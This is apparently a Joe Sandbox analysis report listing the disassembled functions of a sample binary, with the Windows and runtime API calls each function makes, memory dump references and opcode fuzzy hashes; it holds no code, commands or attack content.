                                                                                                    • Instruction ID: 8be30ff35cae28cfc634633eaa2f93b2ad0300d6559acd51498ab987b042c670
                                                                                                    • Opcode Fuzzy Hash: 3beecffe41e1592f88d90101d797bf4f4e5a69357da94ba08beb5e4644d75b3f
                                                                                                    • Instruction Fuzzy Hash: 8F4158B0905B409EE724CF798885AE7FBE5BF18300F50596EE5FE97282CB716694CB10
                                                                                                    Function 00E013DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00E013E1
                                                                                                      • Part of subcall function 00E05E37: __EH_prolog.LIBCMT ref: 00E05E3C
                                                                                                      • Part of subcall function 00E0CE40: __EH_prolog.LIBCMT ref: 00E0CE45
                                                                                                      • Part of subcall function 00E0B505: __EH_prolog.LIBCMT ref: 00E0B50A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: f38cc2fed1f7dcbe003f44648be20f4bf9a5e3972d278ed3eae5cfc3c0d5cce1
                                                                                                    • Instruction ID: df570d22dc215dc5369f53e7400bb37255fd804926af54e53210ee5008edad2d
                                                                                                    • Opcode Fuzzy Hash: f38cc2fed1f7dcbe003f44648be20f4bf9a5e3972d278ed3eae5cfc3c0d5cce1
                                                                                                    • Instruction Fuzzy Hash: 344167B0905B409EE724CF798885AE6FBE5BF18300F50596EE5FE97282CB712694CB10
                                                                                                    Function 00E1359E Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: 720077dbef1d45e7ced00770c26581190208e923de32eb568421be96d951870f
                                                                                                    • Instruction ID: 52b5f560caecc61a014f75d8fa893b8f96b63ccffa84dd62740c617bdf3312f8
                                                                                                    • Opcode Fuzzy Hash: 720077dbef1d45e7ced00770c26581190208e923de32eb568421be96d951870f
                                                                                                    • Instruction Fuzzy Hash: EA21E6B5E40211AFDB14DF74CC416AAB6A8FB08318F00113AE506B6781D3B09A80C7E8
                                                                                                    Function 00E1B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00E1B098
                                                                                                      • Part of subcall function 00E013DC: __EH_prolog.LIBCMT ref: 00E013E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: 42b43dc463b2da5889983b512e7d7db1f58ba38c90114467157166ba21280990
                                                                                                    • Instruction ID: 195aba5829aad6954f2b4bb026b134c500f7da1c2b404cf0e92759ab0edd7f12
                                                                                                    • Opcode Fuzzy Hash: 42b43dc463b2da5889983b512e7d7db1f58ba38c90114467157166ba21280990
                                                                                                    • Instruction Fuzzy Hash: E4316B71D05249AACF15DF64D8519EEBBF4AF09304F10549EE809B7282D735AE44CBA1
                                                                                                    Function 00E2AC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00E2ACF8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 190572456-0
                                                                                                    • Opcode ID: d914477b4c047877e201c93d7abe3ca6ec1a77c4416e28475031b1f51de7d588
                                                                                                    • Instruction ID: 99f01c5b8defbda0ab3f226c96c70e1ea8e6968c49cc5842970b489d4d7a9196
                                                                                                    • Opcode Fuzzy Hash: d914477b4c047877e201c93d7abe3ca6ec1a77c4416e28475031b1f51de7d588
                                                                                                    • Instruction Fuzzy Hash: 4A113A336006395F8B219E2DFC4189AB396AB8436871E5131FC15FB354D730DC0187D2
                                                                                                    Function 00E09215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: 69ddabd6fc9b3123efc7e2a37127c6bc6c252d42856a55d40df06b9ee6240064
                                                                                                    • Instruction ID: 2b5cc4d370b530b5b87421442f6931bac836724c5ce21aa62b043499f5be9667
                                                                                                    • Opcode Fuzzy Hash: 69ddabd6fc9b3123efc7e2a37127c6bc6c252d42856a55d40df06b9ee6240064
                                                                                                    • Instruction Fuzzy Hash: 74016533D01568ABCF15AFA8CD819DEB775AF88750F015515F816BB2A3DA348D84C7A0
                                                                                                    Function 00E2C479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E2B136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00E29813,00000001,00000364,?,00E240EF,?,?,00E41098), ref: 00E2B177
                                                                                                    • _free.LIBCMT ref: 00E2C4E5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 614378929-0
                                                                                                    • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                    • Instruction ID: 73924358ec96e638e5dac4152582682ea768298023e9b356e75ff455a489b488
                                                                                                    • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                    • Instruction Fuzzy Hash: DD0149722003156BE3319F65E88196EFBECFB89330F35192DE194A32C1EA30A905C734
                                                                                                    Function 00E2B136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00E29813,00000001,00000364,?,00E240EF,?,?,00E41098), ref: 00E2B177
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: d19a87f4a63203ef348adedb9f74c9d8194354bef2b6b76cd50a565db589a867
                                                                                                    • Instruction ID: a0393f03da5a66b45392e80502954f805d27a01ae6a870be0da45e342437c6fa
                                                                                                    • Opcode Fuzzy Hash: d19a87f4a63203ef348adedb9f74c9d8194354bef2b6b76cd50a565db589a867
                                                                                                    • Instruction Fuzzy Hash: 29F0B4325075386BEB215A22BC1AB9F7788AB41770B18A151F808BA191CB60D92182E0
                                                                                                    Function 00E23C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00E23C3F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 190572456-0
                                                                                                    • Opcode ID: cb563128bdac267788392a6c1cf53eb575b98b416bcb05ee304b92af170f2b50
                                                                                                    • Instruction ID: bf79ab7dc1c63ccbdcea2c3b4429874b3684c7493c3f12ae66055188713124a7
                                                                                                    • Opcode Fuzzy Hash: cb563128bdac267788392a6c1cf53eb575b98b416bcb05ee304b92af170f2b50
                                                                                                    • Instruction Fuzzy Hash: 3FF0A0322002269F8F158EB9FC0599AB7A9EF01B647105224FA15F7190DB35DA20CFA0
                                                                                                    Function 00E28E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,00E24286,?,0000015D,?,?,?,?,00E25762,000000FF,00000000,?,?), ref: 00E28E38
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: d8be523cf62eb37b8d683d174df67e54b4320bf368efe84cd9871df2f742db10
                                                                                                    • Instruction ID: cb109408337e73f1cb293670665568b94c33659da7173ef942eebdc958a3af5f
                                                                                                    • Opcode Fuzzy Hash: d8be523cf62eb37b8d683d174df67e54b4320bf368efe84cd9871df2f742db10
                                                                                                    • Instruction Fuzzy Hash: C3E06D316072355AEA712666BE09B9F7A889F417B8F177121AC59B6091CF60CC0082E2
                                                                                                    Function 00E05ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00E05AC2
                                                                                                      • Part of subcall function 00E0B505: __EH_prolog.LIBCMT ref: 00E0B50A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: 234c6dfd1a73402b03922c3d59cc6c59663236b3925f7a76987aad00055c7209
                                                                                                    • Instruction ID: 7d8d1a7d27b2f31dad298f477075a99ce773f3ef5bb984077abc67e7d9d8509c
                                                                                                    • Opcode Fuzzy Hash: 234c6dfd1a73402b03922c3d59cc6c59663236b3925f7a76987aad00055c7209
                                                                                                    • Instruction Fuzzy Hash: E3018C30810690DED725E7B8C0457DDFBE4AF64304F50948EA45A73682CBB81B88D7A2
                                                                                                    Function 00E0A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E0A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00E0A592,000000FF,?,?), ref: 00E0A6C4
                                                                                                      • Part of subcall function 00E0A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00E0A592,000000FF,?,?), ref: 00E0A6F2
                                                                                                      • Part of subcall function 00E0A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00E0A592,000000FF,?,?), ref: 00E0A6FE
                                                                                                    • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00E0A598
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$FileFirst$CloseErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 1464966427-0
                                                                                                    • Opcode ID: b05ac6bd292a5113e17ad9a7ac8c10c2d2819a6611117390c721a2190f2a76a0
                                                                                                    • Instruction ID: d639ead0658883d19a5bd1a2b65ab672f33bad6f1193ec21c7401482d43b2db4
                                                                                                    • Opcode Fuzzy Hash: b05ac6bd292a5113e17ad9a7ac8c10c2d2819a6611117390c721a2190f2a76a0
                                                                                                    • Instruction Fuzzy Hash: 25F05E31009794AECA225BB48905BCABBE06F1A321F089A59F1F9621E6C27550D89B23
                                                                                                    Function 00E10E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetThreadExecutionState.KERNEL32(00000001), ref: 00E10E3D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
